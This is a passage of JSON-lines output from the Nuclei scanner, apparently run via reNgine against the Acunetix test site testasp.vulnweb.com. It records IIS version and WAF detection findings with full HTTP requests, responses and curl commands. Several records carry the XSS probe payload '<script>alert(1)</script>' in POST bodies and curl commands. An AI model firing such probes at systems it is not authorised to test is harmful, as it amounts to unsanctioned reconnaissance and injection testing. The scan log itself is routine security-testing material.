denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:44:12.565166099Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/microsoft/microsoft-iis-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/microsoft-iis-version\",\"template-id\":\"microsoft-iis-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/microsoft/microsoft-iis-version.yaml\",\"info\":{\"name\":\"Microsoft IIS version detect\",\"author\":[\"wlayzz\"],\"tags\":[\"tech\",\"microsoft\",\"iis\"],\"description\":\"Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T\",\"extracted-results\":[\"Microsoft-IIS/8.5\"],\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 152\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:44:06 GMT\\r\\nLocation: http://testasp.vulnweb.com/T/\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:44:12.565252967Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/waf-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/waf-detect\",\"template-id\":\"waf-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/waf-detect.yaml\",\"info\":{\"name\":\"WAF Detection\",\"author\":[\"dwisiswant0\",\"lu4nx\"],\"tags\":[\"waf\",\"tech\",\"misc\"],\"description\":\"A web application firewall was detected.\",\"reference\":[\"https://github.com/Ekultek/WhatWaf\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"matcher-name\":\"nginxgeneric\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"POST / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nContent-Length: 27\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e\",\"response\":\"HTTP/1.1 405 Not Allowed\\r\\nConnection: close\\r\\nContent-Length: 559\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:44:18 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e405 Not Allowed\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e405 Not Allowed\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:44:18.535543055Z\",\"curl-command\":\"curl -X 'POST' -d '_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/waf-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/waf-detect\",\"template-id\":\"waf-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/waf-detect.yaml\",\"info\":{\"name\":\"WAF Detection\",\"author\":[\"dwisiswant0\",\"lu4nx\"],\"tags\":[\"waf\",\"tech\",\"misc\"],\"description\":\"A web application firewall was detected.\",\"reference\":[\"https://github.com/Ekultek/WhatWaf\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"matcher-name\":\"nginxgeneric\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"POST / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0\\r\\nConnection: close\\r\\nContent-Length: 27\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e\",\"response\":\"HTTP/1.1 405 Not Allowed\\r\\nConnection: close\\r\\nContent-Length: 157\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:44:18 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e405 Not Allowed\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e405 Not Allowed\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:44:18.536533359Z\",\"curl-command\":\"curl -X 'POST' -d '_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: www.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/waf-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/waf-detect\",\"template-id\":\"waf-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/waf-detect.yaml\",\"info\":{\"name\":\"WAF Detection\",\"author\":[\"dwisiswant0\",\"lu4nx\"],\"tags\":[\"waf\",\"tech\",\"misc\"],\"description\":\"A web application firewall was detected.\",\"reference\":[\"https://github.com/Ekultek/WhatWaf\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"matcher-name\":\"aspgeneric\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T\",\"request\":\"POST /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4854.116 Safari/537.36\\r\\nConnection: close\\r\\nContent-Length: 27\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e\",\"response\":\"HTTP/1.1 405 Method Not Allowed\\r\\nConnection: close\\r\\nContent-Length: 1293\\r\\nAllow: GET, HEAD, OPTIONS, TRACE\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:44:14 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e405 - HTTP verb used to access this page is not allowed.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e405 - HTTP verb used to access this page is not allowed.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:44:18.542215198Z\",\"curl-command\":\"curl -X 'POST' -d '_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: testasp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4854.116 Safari/537.36' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/waf-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/waf-detect\",\"template-id\":\"waf-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/waf-detect.yaml\",\"info\":{\"name\":\"WAF Detection\",\"author\":[\"dwisiswant0\",\"lu4nx\"],\"tags\":[\"waf\",\"tech\",\"misc\"],\"description\":\"A web application firewall was detected.\",\"reference\":[\"https://github.com/Ekultek/WhatWaf\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"matcher-name\":\"modsecurity\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T\",\"request\":\"POST /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4854.116 Safari/537.36\\r\\nConnection: close\\r\\nContent-Length: 27\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e\",\"response\":\"HTTP/1.1 405 Method Not Allowed\\r\\nConnection: close\\r\\nContent-Length: 1293\\r\\nAllow: GET, HEAD, OPTIONS, TRACE\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:44:14 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e405 - HTTP verb used to access this page is not allowed.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e405 - HTTP verb used to access this page is not allowed.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:44:18.542323948Z\",\"curl-command\":\"curl -X 'POST' -d '_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: testasp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4854.116 Safari/537.36' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/waf-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/waf-detect\",\"template-id\":\"waf-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/waf-detect.yaml\",\"info\":{\"name\":\"WAF Detection\",\"author\":[\"dwisiswant0\",\"lu4nx\"],\"tags\":[\"waf\",\"tech\",\"misc\"],\"description\":\"A web application firewall was detected.\",\"reference\":[\"https://github.com/Ekultek/WhatWaf\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"matcher-name\":\"aspgeneric\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"POST /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0 Safari/600.1.25\\r\\nConnection: close\\r\\nContent-Length: 27\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:44:14 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:44:18.543773377Z\",\"curl-command\":\"curl -X 'POST' -d '_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: testasp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0 Safari/600.1.25' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/waf-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/waf-detect\",\"template-id\":\"waf-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/waf-detect.yaml\",\"info\":{\"name\":\"WAF Detection\",\"author\":[\"dwisiswant0\",\"lu4nx\"],\"tags\":[\"waf\",\"tech\",\"misc\"],\"description\":\"A web application firewall was detected.\",\"reference\":[\"https://github.com/Ekultek/WhatWaf\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"matcher-name\":\"aspgeneric\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"POST / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\\r\\nConnection: close\\r\\nContent-Length: 27\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:44:14 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=HLCCLMIBHFACOFHJNJAGDPNL; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca 